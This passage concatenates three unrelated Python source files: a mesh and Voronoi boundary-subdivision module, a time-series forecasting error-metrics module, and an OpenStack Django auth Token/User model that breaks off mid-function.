self.elements = load_triangle_elements(element_file)
else:
self.elements = None
def plot(self,colors=None):
if self.edges is not None:
self.plot_edges(colors=colors)
else:
self.plot_elements(colors=colors)
def plot_edges(self,colors=None):
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
def plot_elements(self,colors=None):
i = np.array([0,1,2,0])
all_lines = self.nodes[self.elements[:,i]]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
_vcenters = None
def vcenters(self):
if self.elements is None:
raise Exception("vcenters() called but elements is None")
if self._vcenters is None:
# just copied from trigrid
self._vcenters = np.zeros(( len(self.elements),2 ), np.float64)
p1x = self.nodes[self.elements[:,0]][:,0]
p1y = self.nodes[self.elements[:,0]][:,1]
p2x = self.nodes[self.elements[:,1]][:,0]
p2y = self.nodes[self.elements[:,1]][:,1]
p3x = self.nodes[self.elements[:,2]][:,0]
p3y = self.nodes[self.elements[:,2]][:,1]
# taken from TRANSFORMER_gang.f90
dd=2.0*((p1x-p2x)*(p1y-p3y) -(p1x-p3x)*(p1y-p2y))
b1=p1x**2+p1y**2-p2x**2-p2y**2
b2=p1x**2+p1y**2-p3x**2-p3y**2
xc=(b1*(p1y-p3y)-b2*(p1y-p2y))/dd
yc=(b2*(p1x-p2x)-b1*(p1x-p3x))/dd
self._vcenters[:,0] = xc
self._vcenters[:,1] = yc
return self._vcenters
_radii = None
def radii(self):
if self._radii is None:
vcenters = self.vcenters()
vcorners = self.nodes[self.elements[:,0]]
self._radii = np.sqrt( ((vcenters - vcorners)**2).sum(axis=1) )
return self._radii
_nodes2elements = None
def nodes2elements(self,n1,n2):
if self._nodes2elements is None:
e2e = {}
print("building hash of edges to elements")
for c in range(len(self.elements)):
for i in range(3):
a = self.elements[c,i]
b = self.elements[c,(i+1)%3]
if a > b:
a,b = b,a
k = (a,b)
if not e2e.has_key(k):
e2e[k] = []
e2e[ k ].append(c)
self._nodes2elements = e2e
print("done")
if n1 > n2:
n1,n2 = n2,n1
return self._nodes2elements[(n1,n2)]
class Boundary(object):
n_cleaned = 0 # bean-counter for remove_repeated
def __init__(self,geo=None,nodes=None,clean_geo=True):
"""
geo: a Shapely polygon (with holes, ok)
nodes: an array of points, taken to be the exterior ring of a polygon
clean_geo: if true, traverse the rings and removed repeated nodes
"""
if geo:
all_nodes = []
all_edges = []
holes = []
start_n = 0
rings = [geo.exterior] + list(geo.interiors)
for ring in rings:
orig_nodes = np.array(ring.coords)
if clean_geo:
orig_nodes = self.remove_repeated(orig_nodes)
# remove repeated last coordinate
these_nodes = orig_nodes[:-1]
n_nodes = these_nodes.shape[0]
n = np.arange(n_nodes)
these_edges = start_n + np.transpose( np.array([n,(n+1)%n_nodes]) )
all_nodes.append(these_nodes)
all_edges.append(these_edges)
start_n += n_nodes
ring_poly = geometry.Polygon( these_nodes )
point_inside = point_in_polygon(ring_poly)
holes.append(point_inside)
self.nodes = np.concatenate( all_nodes ) # array(geo.exterior.coords)[:-1,:]
self.edges = np.concatenate( all_edges )
self.holes = np.array(holes[1:])
self.geo = geo
if clean_geo:
print("Removed %i repeated nodes"%self.n_cleaned)
else:
self.nodes = nodes
n_nodes = self.nodes.shape[0]
# construct an edge array that just matches consecutive
# nodes
n = np.arange(n_nodes)
self.edges = np.transpose(np.array([n,(n+1)%n_nodes]))
self.holes = np.zeros((0,2))
# automatically find a basic lower-bound length scale
min_dist_sqr = (((self.nodes[1:] - self.nodes[:-1])**2).sum(axis=1)).min()
self.min_edge_length = np.sqrt(min_dist_sqr)
#print("Minimum edge length in boundary inputs is ",self.min_edge_length)
self._vor = None
self._tri = None
_nodes2edge = None
def nodes2edge(self,a,b):
# if a,b is boundary edge, return the edge id, otherwise return None
if self._nodes2edge is None:
self._nodes2edge = {}
for e in range(len(self.edges)):
c,d = self.edges[e]
if c > d:
d,c = c,d
self._nodes2edge[ (c,d) ] = e
if a>b:
b,a = a,b
k = (a,b)
if self._nodes2edge.has_key(k):
return self._nodes2edge[k]
else:
return None
def remove_repeated(self,ring):
"""Remove repeated nodes from an array.
"""
mask = np.zeros( len(ring),np.bool8 )
mask[:-1] = np.all(ring[:-1]==ring[1:],axis=1)
# for i in range(len(ring)-1):
# if all(ring[i+1]==ring[i]):
# mask[i] = True
self.n_cleaned += mask.sum()
return ring[~mask,:]
def vor(self):
if self._vor is None:
self.triangulate()
return self._vor
def triangulation(self):
if self._tri is None:
self.triangulate()
return self._tri
def plot(self,colors=None):
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
# if len(self.holes) > 0:
# plot(self.holes[:,0],self.holes[:,1],'ro')
plt.draw()
def plot_lines(self):
plt.plot(self.nodes[:,0], self.nodes[:,1], 'k')
def split_edges(self,edge_indexes):
new_nodes = np.nan * np.ones((len(edge_indexes),2), np.float64)
new_edges = -1 * np.ones((len(edge_indexes),2), np.int32)
# remember what the next free edge and node are
next_edge = self.edges.shape[0]
next_node = self.nodes.shape[0]
# extend nodes and edges:
self.nodes = np.concatenate( (self.nodes,new_nodes), axis=0 )
self.edges = np.concatenate( (self.edges,new_edges), axis=0 )
ordering = np.arange(self.nodes.shape[0],dtype=np.float64)
ordering[next_node:] = -1
for i in range(len(edge_indexes)):
# node indices to the old endpoints
pntA,pntC = self.edges[edge_indexes[i]]
pntB = next_node+i
self.nodes[pntB] = 0.5*(self.nodes[pntA] + self.nodes[pntC])
self.edges[edge_indexes[i],1] = pntB
self.edges[next_edge+i] = [pntB,pntC]
ordering[pntB] = 0.5*(ordering[pntA]+ordering[pntC])
new_order = np.argsort(ordering)
# so j = new_order[i] means that old node j will get mapped
# to new node i
self.nodes = self.nodes[new_order]
# the "inverse" of new_order
mapping = np.argsort(new_order)
# not sure about this. too late to prove it to myself that
# it works short of just testing it
self.edges = mapping[self.edges]
self._nodes2edge = None
def write_poly(self,poly_filename):
""" write a triangle compatible poly file
"""
# and then only the exterior ring:
point_list = self.nodes
# probably unnecessary
if np.all(point_list[0]==point_list[-1]):
raise Exception("Boundary should have already stripped any repeated endpoints")
npoints = point_list.shape[0]
# triangle wants the basic planar-straight-line-graph
poly_fp = open(poly_filename,'wt')
# first line is
# First line: <# of vertices> <dimension (must be 2)> <# of attributes> <# of boundary markers (0 or 1)>
poly_fp.write("%i 2 0 0\n"%(npoints))
# Write out vertices
for i in range(npoints):
# <vertex #> <x> <y> [attributes] [boundary marker]
poly_fp.write("%i %f %f\n"%(i,point_list[i,0],point_list[i,1]))
# Write out segments
# <# of segments> <# of boundary markers (0 or 1)>
poly_fp.write("%i 0\n"%(npoints))
for i in range(len(self.edges)):
# <segment #> <endpoint> <endpoint> [boundary marker]
poly_fp.write("%i %i %i\n"%(i,self.edges[i,0],self.edges[i,1]))
# number of holes
poly_fp.write( "%d\n"%self.holes.shape[0] )
for i in range(self.holes.shape[0]):
poly_fp.write("%d %f %f\n"%(i, self.holes[i,0], self.holes[i,1]) )
poly_fp.close()
# def triangulate(self):
# ### Run some triangle stuff:
# poly_file = "test2.poly"
# self.write_poly(poly_file)
#
# cmd = "%s -e -D -p -v %s"%(triangle_path,poly_file)
# subprocess.call(cmd,shell=True) # ,stdout=file('/dev/null','w') )
#
# # probably we should get the real geometry that was used, otherwise
# # things will get confusing
# self.read_poly('test2.1.poly')
#
# self._tri = Graph('test2.1')
# self._vor = VoronoiDiagram('test2.1.v')
def read_poly(self,poly_file):
""" After triangulating, there may have been Steiner points
added, and they will exist in the output .poly file.
This reads that file and replaces self.nodes and self.edges
with the information in the given polyfile. Holes will be
kept the same (although it would be valid to re-read holes, too.
"""
poly_fp = open(poly_file,'rt')
new_edges = []
new_nodes = []
n_nodes,dim,n_attrs,n_markers = map(int,poly_fp.readline().split())
if n_nodes == 0:
# print("Reading nodes from separate file")
new_nodes = load_triangle_nodes(poly_file.replace('.poly','.node'))
else:
raise Exception("Not ready for reading inline nodes")
n_segments,n_markers = map(int,poly_fp.readline().split())
new_edges = np.zeros((n_segments,dim), np.int32)
for i in range(n_segments):
vals = map(int,poly_fp.readline().split())
new_edges[i] = vals[1:3]
# install the new data:
self.edges = new_edges
self.nodes = new_nodes
self.geo = None
self.src = poly_file
def subdivide(self):
""" Find edges that need to be sampled with smaller
steps and divide them into two edges.
returns the number of new edges / nodes
method: calculate voronoi radii
iterate over edges in boundary
for each edge, find the voronoi point that they have
in common. So this edge should be part of a triangle,
and we are getting the center of that triangle.
the voronoi radius with the distance between the voronoi
point and the edge. If the edge is too long and needs to
be subdivided, it will be long (and the voronoi radius large)
compared to the distance between the edge and the vor. center.
Can this be done without the vor. radii?
need
"""
# the old way calculated voronoi radii and searched for nodes
# on those circumcircles. For subdividing, we just need to match
# each edge with the one voronoi point it belongs to.
# vor = self.vor()
# vor.calc_radii(self.nodes)
# the new way - calculated voronoi points directly from the triangles
# in the delaunay triangulation, then match with edges with a hash
# on edge [a,b] node pairs
triangulation = self.triangulation()
vcenters = triangulation.vcenters()
n_edges = self.edges.shape[0]
to_subdivide = np.zeros(n_edges, np.float64)
# the only way this works is for the boundary nodes to be exactly
# the same, so we go boundary edge -> nodes -> delaunay element
if np.any( self.nodes != triangulation.nodes ):
raise Exception("Triangulation and boundary use different nodes.")
print("Choosing edges to subdivide")
for i in range(n_edges): # over boundary edges
a,b = self.edges[i]
elements = triangulation.nodes2elements(a,b)
if len(elements) != 1:
print("Edge %d,%d mapped to elements %s"%(a,b,elements))
raise Exception("Boundary edges should map to exactly one element")
element = elements[0]
# compute the point-line distance between
# this edge and the v center, then compare to
# the distance from the endpoint to that
# vcenter
pntV = vcenters[element]
pntA = self.nodes[a]
pntB = self.nodes[b]
v_radius = np.sqrt( ((pntA-pntV)**2).sum() )
line_clearance = np.sqrt( (( 0.5*(pntA+pntB) - pntV)**2).sum() )
if v_radius > 1.2*line_clearance and v_radius > self.min_edge_length:
# second check - make sure that neither AC nor BC are also on the
# boundary
p1,p2,p3 = triangulation.elements[element]
count = 0
if self.nodes2edge(p1,p2) is not None:
count += 1
if self.nodes2edge(p2,p3) is not None:
count += 1
if self.nodes2edge(p3,p1) is not None:
count += 1
if count == 1:
to_subdivide[i] = 3
elif count == 0:
global bad_boundary
bad_boundary = self
print("While looking at edge %d=(%d,%d)"%(i,a,b))
raise Exception("We should have found at least 1 boundary edge")
elif count == 3:
print("WARNING: Unexpected count of boundary edges in one element: ",count)
# if 2, then it's a corner and we probably don't want to subdivide
self.to_subdivide = to_subdivide
bad_edges = where(to_subdivide)[0]
self.split_edges( bad_edges )
# invalidate these:
self._vor = None
self._tri = None
return len(bad_edges)
def subdivide_iterate(self):
while 1:
n_new = self.subdivide()
print("Subdivide made %d new nodes"%n_new)
if n_new == 0:
break
class VoronoiDiagram(Graph):
radii = None
dual_nodes = None
dual_lookup = {}
def calc_radii(self,del_nodes):
""" for each of the voronoi points, find it's radius and
which delaunay points are responsible for it.
"""
n_nodes = self.nodes.shape[0]
self.radii = np.zeros( n_nodes, np.float64)
self.dual_nodes = [None]*n_nodes
self.dual_lookup = {} # map dual node index to list of vcenters
# this is where all the time goes!
# so make a field for the delaunay nodes that will speed up finding them
I = np.arange(len(del_nodes))
del_field = field.XYZField(del_nodes, 'nope')
del_field.build_index()
for i in range(n_nodes):
if i % 1000 == 0:
print(i)
# find the nearest one...
nearest = del_field.nearest(self.nodes[i])
min_radius = np.sqrt( ((del_nodes[nearest] - self.nodes[i])**2).sum() )
all_near = del_field.within_r(self.nodes[i], 1.00000001*min_radius)
# dists_sqr = ((del_nodes - self.nodes[i,:])**2).sum(axis=1)
# rad_sqr = dists_sqr.min()
# self.dual_nodes[i] = find( dists_sqr <= 1.00001*rad_sqr )
self.dual_nodes[i] = np.array(all_near)
for dual_node_idx in self.dual_nodes[i]:
if not self.dual_lookup.has_key(dual_node_idx):
self.dual_lookup[dual_node_idx] = []
self.dual_lookup[dual_node_idx].append(i)
self.radii[i] = min_radius # sqrt(rad_sqr)
def merge_points(self,tol):
""" After a call to calc_radii(), this can be called to coalesce voronio points
that are close to each other
"""
while len(self.nodes) > 1:
# look for short edges:
edge_ends = self.nodes[ self.edges ]
edge_centers = edge_ends.mean(axis=1)
edge_tols = tol(edge_centers)
edge_lengths = np.sqrt( ((edge_ends[:,1,:] - edge_ends[:,0,:])**2).sum(axis=1) )
rel_edge_lengths = edge_lengths / edge_tols
to_merge = np.argmin(rel_edge_lengths)
if rel_edge_lengths[ to_merge ] < 1.0:
# print(" got an edge to merge.")
self.merge_edge( to_merge )
else:
break
def merge_edge(self,e):
a,b = self.edges[e]
# print("merging voronoi edge ",a,b)
self.edges = np.concatenate( (self.edges[:e], self.edges[e+1:]) )
# map old node indices to new ones:
node_mapping = np.arange(len(self.nodes))
# b has become a
node_mapping[b] = a
# and everybody greater than b is shifted down
node_mapping[ node_mapping > b] -= 1
if self.radii is not None:
self.radii = np.concatenate( (self.radii[:b], self.radii[b+1:]) )
# combine their dual nodes:
self.dual_nodes[a] = np.unique( np.concatenate( (self.dual_nodes[a],self.dual_nodes[b]) ) )
# then remove b from the list
self.dual_nodes = self.dual_nodes[:b] + self.dual_nodes[b+1:]
for k in self.dual_lookup.keys():
l = self.dual_lookup[k]
# k is an index to the boundary points
# l is a list of indices to voronoi centers
if b in l:
l.remove( b )
if not a in l:
l.append(a)
# keep it as a list for now.
self.dual_lookup[k] = node_mapping[ np.array(l) ].tolist()
# new node is between the old two nodes:
self.nodes[a] = 0.5*(self.nodes[a] + self.nodes[b])
self.edges = node_mapping[ self.edges ]
self.nodes = np.concatenate( (self.nodes[:b], self.nodes[b+1:] ) )
def centers_for_dual_node(self,dual_node):
if self.dual_lookup.has_key(dual_node):
return self.dual_lookup[dual_node]
else:
return []
def plot_radii(self):
a = gca()
for i in range(self.nodes.shape[0]):
cir = Circle( self.nodes[i], radius=self.radii[i])
a.add_patch(cir)
def plot_vor_points(self):
try:
colors = self.radii
print("Got colors from radii")
plt.scatter(self.nodes[:,0],self.nodes[:,1],50,colors,
lw=0,vmin=200,vmax=250)
except:
plt.plot(self.nodes[:,0],self.nodes[:,1],'r+')
def plot(self,show_vor_points=True):
if show_vor_points:
self.plot_vor_points()
# plot the finite edges:
# build up the list of lines:
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
coll.set_color('m')
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
# since the triangulation didn't add any nodes, just
# use the boundaries nodes instead of tri.nodes
# ### Check radius against edge / voronoi center
# if __name__ == '__main__':
# ### Load the data
# # boundary = load_shp.Boundary('/home/rusty/classes/research/meshing/dumbarton.shp')
#
# # this is full bay, already filtered at 50m
# boundary = load_shp.Boundary('/home/rusty/classes/research/spatialdata/us/ca/suntans/shoreline/noaa-medres/sfbay-100km-arc/sfbay-100km-arc-50_20.shp')
#
# geo = boundary.geo
#
# # points = array( geo.exterior.coords )
# # points = points[:-1]
#
# # from paver import upsample_linearring
# # points = upsample_linearring(points,50)
#
# bdry_ma = Boundary( geo=geo )
# print("subdividing...")
# bdry_ma.subdivide_iterate()
# print("done")
#
# vor = bdry_ma.vor()
# #tri = bdry_ma.tri()
# #tri.plot()
#
# print("Calculating radii")
# vor.calc_radii(bdry_ma.nodes)
# print("done")
#
# bdry_ma.plot()
# bdry_ma.vor().plot_vor_points()
# plt.axis('equal')
# plt.draw()
|
|
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import pandas as pd
from functools import partial
from math import sqrt
from multiprocessing import Pool
from typing import Callable, Optional
AVAILABLE_METRICS = ['mse', 'rmse', 'mape', 'smape', 'mase', 'rmsse',
'mini_owa', 'pinball_loss']
######################################################################
# METRICS
######################################################################
def mse(y: np.array, y_hat:np.array) -> float:
"""Calculates Mean Squared Error.
MSE measures the prediction accuracy of a
forecasting method by calculating the squared deviation
of the prediction and the true value at a given time and
averages these devations over the length of the series.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar:
MSE
"""
mse = np.mean(np.square(y - y_hat))
return mse
def rmse(y: np.array, y_hat:np.array) -> float:
"""Calculates Root Mean Squared Error.
RMSE measures the prediction accuracy of a
forecasting method by calculating the squared deviation
of the prediction and the true value at a given time and
averages these devations over the length of the series.
Finally the RMSE will be in the same scale
as the original time series so its comparison with other
series is possible only if they share a common scale.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: RMSE
"""
rmse = sqrt(np.mean(np.square(y - y_hat)))
return rmse
def mape(y: np.array, y_hat:np.array) -> float:
"""Calculates Mean Absolute Percentage Error.
MAPE measures the relative prediction accuracy of a
forecasting method by calculating the percentual deviation
of the prediction and the true value at a given time and
averages these devations over the length of the series.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: MAPE
"""
mape = np.mean(np.abs(y - y_hat) / np.abs(y))
mape = 100 * mape
return mape
def smape(y: np.array, y_hat:np.array) -> float:
"""Calculates Symmetric Mean Absolute Percentage Error.
SMAPE measures the relative prediction accuracy of a
forecasting method by calculating the relative deviation
of the prediction and the true value scaled by the sum of the
absolute values for the prediction and true value at a
given time, then averages these devations over the length
of the series. This allows the SMAPE to have bounds between
0% and 200% which is desireble compared to normal MAPE that
may be undetermined.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: SMAPE
"""
scale = np.abs(y) + np.abs(y_hat)
scale[scale == 0] = 1e-3
smape = np.mean(np.abs(y - y_hat) / scale)
smape = 200 * smape
return smape
def mase(y: np.array, y_hat: np.array,
y_train: np.array, seasonality: int = 1) -> float:
"""Calculates the M4 Mean Absolute Scaled Error.
MASE measures the relative prediction accuracy of a
forecasting method by comparinng the mean absolute errors
of the prediction and the true value against the mean
absolute errors of the seasonal naive model.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
y_train: numpy array
actual train values for Naive1 predictions
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
Returns
-------
scalar: MASE
"""
scale = np.mean(abs(y_train[seasonality:] - y_train[:-seasonality]))
mase = np.mean(abs(y - y_hat)) / scale
mase = 100 * mase
return mase
def rmsse(y: np.array, y_hat: np.array,
y_train: np.array, seasonality: int = 1) -> float:
"""Calculates the M5 Root Mean Squared Scaled Error.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
y_train: numpy array
actual train values
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
Returns
-------
scalar: RMSSE
"""
scale = np.mean(np.square(y_train[seasonality:] - y_train[:-seasonality]))
rmsse = sqrt(mse(y, y_hat) / scale)
rmsse = 100 * rmsse
return rmsse
def mini_owa(y: np.array, y_hat: np.array,
y_train: np.array,
seasonality: int,
y_bench: np.array):
"""Calculates the Overall Weighted Average for a single series.
MASE, sMAPE for Naive2 and current model
then calculatess Overall Weighted Average.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
y_train: numpy array
insample values of the series for scale
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
y_bench: numpy array of len h (forecasting horizon)
predicted values of the benchmark model
Returns
-------
return: mini_OWA
"""
mase_y = mase(y, y_hat, y_train, seasonality)
mase_bench = mase(y, y_bench, y_train, seasonality)
smape_y = smape(y, y_hat)
smape_bench = smape(y, y_bench)
mini_owa = ((mase_y/mase_bench) + (smape_y/smape_bench))/2
return mini_owa
def pinball_loss(y: np.array, y_hat: np.array, tau: int = 0.5):
"""Calculates the Pinball Loss.
The Pinball loss measures the deviation of a quantile forecast.
By weighting the absolute deviation in a non symmetric way, the
loss pays more attention to under or over estimation.
A common value for tau is 0.5 for the deviation from the median.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
tau: float
Fixes the quantile against which the predictions are compared.
Returns
-------
return: pinball_loss
"""
delta_y = y - y_hat
pinball = np.maximum(tau * delta_y, (tau-1) * delta_y)
pinball = pinball.mean()
return pinball
######################################################################
# PANEL EVALUATION
######################################################################
def _evaluate_ts(uid, y_test, y_hat,
y_train, metric,
seasonality, y_bench, metric_name):
y_test_uid = y_test.loc[uid].y.values
y_hat_uid = y_hat.loc[uid].y_hat.values
if metric_name in ['mase', 'rmsse']:
y_train_uid = y_train.loc[uid].y.values
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid,
y_train=y_train_uid,
seasonality=seasonality)
elif metric_name in ['mini_owa']:
y_train_uid = y_train.loc[uid].y.values
y_bench_uid = y_bench.loc[uid].y_hat.values
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid,
y_train=y_train_uid,
seasonality=seasonality,
y_bench=y_bench_uid)
else:
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid)
return uid, evaluation_uid
def evaluate_panel(y_test: pd.DataFrame,
y_hat: pd.DataFrame,
y_train: pd.DataFrame,
metric: Callable,
seasonality: Optional[int] = None,
y_bench: Optional[pd.DataFrame] = None,
threads: Optional[int] = None):
"""Calculates a specific metric for y and y_hat (and y_train, if needed).
Parameters
----------
y_test: pandas df
df with columns ['unique_id', 'ds', 'y']
y_hat: pandas df
df with columns ['unique_id', 'ds', 'y_hat']
y_train: pandas df
df with columns ['unique_id', 'ds', 'y'] (train)
This is used in the scaled metrics ('mase', 'rmsse').
metric: callable
loss function
seasonality: int
Main frequency of the time series.
Used in ('mase', 'rmsse').
Commonly used seasonalities:
Hourly: 24,
Daily: 7,
Weekly: 52,
Monthly: 12,
Quarterly: 4,
Yearly: 1.
y_bench: pandas df
df with columns ['unique_id', 'ds', 'y_hat']
predicted values of the benchmark model
This is used in 'mini_owa'.
threads: int
Number of threads to use. Use None (default) for parallel processing.
Returns
------
pandas dataframe:
loss ofr each unique_id in the panel data
"""
metric_name = metric.__code__.co_name
uids = y_test['unique_id'].unique()
y_hat_uids = y_hat['unique_id'].unique()
assert len(y_test)==len(y_hat), "not same length"
assert all(uids == y_hat_uids), "not same u_ids"
y_test = y_test.set_index(['unique_id', 'ds'])
y_hat = y_hat.set_index(['unique_id', 'ds'])
if metric_name in ['mase', 'rmsse']:
y_train = y_train.set_index(['unique_id', 'ds'])
elif metric_name in ['mini_owa']:
y_train = y_train.set_index(['unique_id', 'ds'])
y_bench = y_bench.set_index(['unique_id', 'ds'])
partial_evaluation = partial(_evaluate_ts, y_test=y_test, y_hat=y_hat,
y_train=y_train, metric=metric,
seasonality=seasonality,
y_bench=y_bench,
metric_name=metric_name)
with Pool(threads) as pool:
evaluations = pool.map(partial_evaluation, uids)
evaluations = pd.DataFrame(evaluations, columns=['unique_id', 'error'])
return evaluations
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
from django.conf import settings
from django.contrib.auth import models
from django.db import models as dbmodels
from keystoneclient.common import cms as keystone_cms
from keystoneclient import exceptions as keystone_exceptions
from openstack_auth import utils
LOG = logging.getLogger(__name__)
_TOKEN_HASH_ENABLED = getattr(settings, 'OPENSTACK_TOKEN_HASH_ENABLED', True)
def set_session_from_user(request, user):
request.session['token'] = user.token
request.session['user_id'] = user.id
request.session['region_endpoint'] = user.endpoint
request.session['services_region'] = user.services_region
# Update the user object cached in the request
request._cached_user = user
request.user = user
def create_user_from_token(request, token, endpoint, services_region=None):
# if the region is provided, use that, otherwise use the preferred region
svc_region = services_region or \
utils.default_services_region(token.serviceCatalog, request)
return User(id=token.user['id'],
token=token,
user=token.user['name'],
user_domain_id=token.user_domain_id,
# We need to consider already logged-in users with an old
# version of Token without user_domain_name.
user_domain_name=getattr(token, 'user_domain_name', None),
project_id=token.project['id'],
project_name=token.project['name'],
domain_id=token.domain['id'],
domain_name=token.domain['name'],
enabled=True,
service_catalog=token.serviceCatalog,
roles=token.roles,
endpoint=endpoint,
services_region=svc_region,
is_federated=getattr(token, 'is_federated', False),
unscoped_token=getattr(token, 'unscoped_token',
request.session.get('unscoped_token')))
class Token(object):
"""Encapsulates the AccessInfo object from keystoneclient.
Token object provides a consistent interface for accessing the keystone
token information and service catalog.
Added for maintaining backward compatibility with horizon that expects
Token object in the user object.
"""
def __init__(self, auth_ref, unscoped_token=None):
# User-related attributes
user = {}
user['id'] = auth_ref.user_id
user['name'] = auth_ref.username
self.user = user
self.user_domain_id = auth_ref.user_domain_id
self.user_domain_name = auth_ref.user_domain_name
# Token-related attributes
self.id = auth_ref.auth_token
self.unscoped_token = unscoped_token
if (_TOKEN_HASH_ENABLED and
(keystone_cms.is_asn1_token(self.id)
or keystone_cms.is_pkiz(self.id))):
algorithm = getattr(settings, 'OPENSTACK_TOKEN_HASH_ALGORITHM',
'md5')
hasher = hashlib.new(algorithm)
hasher.update(self.id)
self.id = hasher.hexdigest()
# If the scoped_token is long, then unscoped_token must be too.
hasher.update(self.unscoped_token)
self.unscoped_token = hasher.hexdigest()
self.expires = auth_ref.expires
# Project-related attributes
project = {}
project['id'] = auth_ref.project_id
project['name'] = auth_ref.project_name
self.project = project
self.tenant = self.project
# Domain-related attributes
domain = {}
domain['id'] = auth_ref.domain_id
domain['name'] = auth_ref.domain_name
self.domain = domain
# Federation-related attributes
self.is_federated = auth_ref.is_federated
if auth_ref.version == 'v2.0':
self.roles = auth_ref['user'].get('roles', [])
else:
self.roles = auth_ref.get('roles', [])
self.serviceCatalog = auth_ref.service_catalog.get_data()
class User(models.AbstractBaseUser, models.PermissionsMixin):
"""A User class with some extra special sauce for Keystone.
In addition to the standard Django user attributes, this class also has
the following:
.. attribute:: token
The Keystone token object associated with the current user/tenant.
The token object is deprecated, user auth_ref instead.
.. attribute:: tenant_id
The id of the Keystone tenant for the current user/token.
The tenant_id keyword argument is deprecated, use project_id instead.
.. attribute:: tenant_name
The name of the Keystone tenant for the current user/token.
The tenant_name keyword argument is deprecated, use project_name
instead.
.. attribute:: project_id
The id of the Keystone project for the current user/token.
.. attribute:: project_name
The name of the Keystone project for the current user/token.
.. attribute:: service_catalog
The ``ServiceCatalog`` data returned by Keystone.
.. attribute:: roles
A list of dictionaries containing role names and ids as returned
by Keystone.
.. attribute:: services_region
A list of non-identity service endpoint regions extracted from the
service catalog.
.. attribute:: user_domain_id
The domain id of the current user.
.. attribute:: user_domain_name
The domain name of the current user.
.. attribute:: domain_id
The id of the Keystone domain scoped for the current user/token.
.. attribute:: is_federated
Whether user is federated Keystone user. (Boolean)
.. attribute:: unscoped_token
Unscoped Keystone token.
"""
USERNAME_FIELD = 'id'
id = dbmodels.CharField(max_length=240, primary_key=True)
def __init__(self, id=None, token=None, user=None, tenant_id=None,
service_catalog=None, tenant_name=None, roles=None,
authorized_tenants=None, endpoint=None, enabled=False,
services_region=None, user_domain_id=None,
user_domain_name=None, domain_id=None, domain_name=None,
project_id=None, project_name=None,
is_federated=False, unscoped_token=None, password=None):
self.id = id
self.pk = id
self.token = token
self.username = user
self.user_domain_id = user_domain_id
self.user_domain_name = user_domain_name
self.domain_id = domain_id
self.domain_name = domain_name
self.project_id = project_id or tenant_id
self.project_name = project_name or tenant_name
self.service_catalog = service_catalog
self._services_region = (
services_region
or utils.default_services_region(service_catalog)
)
self.roles = roles or []
self.endpoint = endpoint
self.enabled = enabled
self._authorized_tenants = authorized_tenants
self.is_federated = is_federated
# Unscoped token is used for listing user's project that works
# for both federated and keystone user.
self.unscoped_token = unscoped_token
self.password = None
# List of variables to be deprecated.
self.tenant_id = self.project_id
self.tenant_name = self.project_name
self.USERNAME_FIELD = self.username
def __unicode__(self):
return self.username
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.username)
def is_token_expired(self, margin=None):
"""Determine if the token is expired.
Returns ``True`` if the token is expired, ``False`` if not, and
``None`` if there is no token set.
:param margin:
A security time margin in seconds before real expiration.
Will return ``True`` if the token expires in less than ``margin``
seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
if self.token is None:
return None
return not utils.is_token_valid(self.token, margin)
def is_authenticated(self, margin=None):
"""Checks for a valid authentication.
:param margin:
A security time margin in seconds before end of authentication.
Will return ``False`` if authentication ends in less than ``margin``
seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
return (self.token is not None and
utils.is_token_valid(self.token, margin))
def is_anonymous(self, margin=None):
"""Return if the user is not authenticated.
Returns ``True`` if not authenticated,``False`` otherwise.
:param margin:
A security time margin in seconds before end of an eventual
authentication.
Will return ``True`` even if authenticated but that authentication
ends in less than ``margin`` seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
return not self.is_authenticated(margin)
@property
def is_active(self):
return self.enabled
@property
def is_superuser(self):
"""Evaluates whether this user has admin privileges.
Returns ``True`` or ``False``.
"""
admin_roles = [role.lower() for role in getattr(
settings,
'OPENSTACK_KEYSTONE_ADMIN_ROLES',
['admin'])]
user_roles = [role['name'].lower() for role in self.roles]
return True if set(admin_roles).intersection(user_roles) else False
@property
def authorized_tenants(self):
"""Returns a memoized list of tenants this user may access."""
if self.is_authenticated() and self._authorized_tenants is None:
endpoint = self.endpoint
try:
self._authorized_tenants = utils.get_project_list(
user_id=self.id,
auth_url=endpoint,
